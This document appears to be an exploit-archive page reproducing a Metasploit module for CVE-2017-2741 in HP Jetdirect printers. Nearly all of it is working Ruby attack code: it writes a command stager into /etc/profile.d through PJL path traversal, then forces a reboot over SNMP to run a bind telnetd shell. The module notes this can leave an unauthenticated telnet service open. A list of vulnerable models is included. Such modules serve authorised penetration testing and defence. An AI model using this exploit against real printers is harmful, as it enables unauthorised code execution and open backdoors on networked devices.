hp jetdirect path traversal arbitrary code execution (metasploit)

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hp jetdirect path traversal arbitrary code execution (metasploit) Code Code...
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require "rex/proto/pjl" class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SNMPClient include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'HP Jetdirect Path Traversal Arbitrary Code Execution', 'Description' => %q{ The module exploits a path traversal via Jetdirect to gain arbitrary code execution by writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer is restarted using SNMP. Impacted printers: HP PageWide Managed MFP P57750dw HP PageWide Managed P55250dw HP PageWide Pro MFP 577z HP PageWide Pro 552dw HP PageWide Pro MFP 577dw HP PageWide Pro MFP 477dw HP PageWide Pro 452dw HP PageWide Pro MFP 477dn HP PageWide Pro 452dn HP PageWide MFP 377dw HP PageWide 352dw HP OfficeJet Pro 8730 All-in-One Printer HP OfficeJet Pro 8740 All-in-One Printer HP OfficeJet Pro 8210 Printer HP OfficeJet Pro 8216 Printer HP OfficeJet Pro 8218 Printer Please read the module documentation regarding the possibility for leaving an unauthenticated telnetd service running as a side effect of this exploit. }, 'Author' => [ 'Jacob Baines', # Python PoC 'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-2741' ], [ 'URL', 'https://support.hp.com/lt-en/document/c05462914' ], [ 'URL', 'http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution' ] ], 'Targets' => [ ['Unix (In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd' } }, ] ], 'Privileged' => true, 'DisclosureDate' => 'Apr 05 2017', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd', 'WfsDelay' => 180 } )) register_options( [ Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT), OptPort.new('SNMPPORT', [true, 'The SNMP port', 161]) ] ) end def execute_command(cmd, opts = {}) rpath = '0:/../../rw/var/etc/profile.d/' stager_script_name = opts[:stager_script_name] cmd = "(cd / && #{cmd}); rm -f /etc/profile.d/#{stager_script_name}" begin # use PJL to write command stager print_status("Connecting to port #{rport}...") pjl = Rex::Proto::PJL::Client.new(sock) pjl.begin_job pjl.fsinit(rpath[0..1]) print_status("Attempting to write command stager...") rpath = "#{rpath}#{stager_script_name}" if pjl.fsdownload(cmd, rpath, is_file: false) print_good("Successfully wrote command stager to #{rpath}") else print_error("Failed to write command stager to #{rpath}") return end # verify command stager exists unless pjl.fsquery(rpath) print_error("Command stager does not exist at #{rpath}; aborting...") return end pjl.end_job rescue Rex::ConnectionError print_error("Connection Refused") raise end end def restart_printer pjl_port = datastore['RPORT'] snmp_port = datastore['SNMPPORT'] community = datastore['COMMUNITY'] # Printer MIB prtGeneralReset object identifier (numeric notation) prt_general_reset = '' # prtGeneralReset powerCycleReset(4) value power_cycle_reset = 4 begin # TODO: Update when there is a clean approach to using two or more mixins that both use RPORT. datastore['RPORT'] = snmp_port print_status("Connecting to SNMP port #{rport}...") snmp = connect_snmp # get value of Printer MIB prtGeneralReset reset_value = snmp.get_value(prt_general_reset) reset_value = "''" if reset_value.is_a?(SNMP::Null) print_status("Initial value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}") # set value of Printer MIB prtGeneralReset to powerCycleReset(4) print_status("Attempting to restart printer via SNMP...") varbind = SNMP::VarBind.new(prt_general_reset, SNMP::Integer.new(power_cycle_reset)) response = snmp.set(varbind) if response.error_status == :noError print_status("Set prtGeneralReset OID #{prt_general_reset} => #{power_cycle_reset}") # get value of Printer MIB prtGeneralReset reset_value = snmp.get_value(prt_general_reset) reset_value = "''" if reset_value.is_a?(SNMP::Null) print_status("Current value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}") print_status("Printer restarting...") else print_error("Unable to set prtGeneralReset; SNMP response error status: #{response.error_status}") end rescue SNMP::RequestTimeout print_error("SNMP request timeout with community '#{community}'") raise rescue SNMP::UnsupportedVersion print_error("Unsupported SNMP version specified; use '1' or '2c'") raise rescue Rex::ConnectionError print_error("Connection Refused") raise ensure # restore original rport value datastore['RPORT'] = pjl_port end end def exploit begin opts = { stager_script_name: "#{Rex::Text.rand_text_alpha(8)}.sh" } print_status("Exploiting...") connect if target.name =~ /Unix/ execute_command(payload.encoded, opts) else execute_cmdstager(opts) end restart_printer return ensure disconnect end end end

Hp jetdirect path traversal arbitrary code execution (metasploit) Vulnerability / Exploit Source : Hp jetdirect path traversal arbitrary code execution (metasploit)

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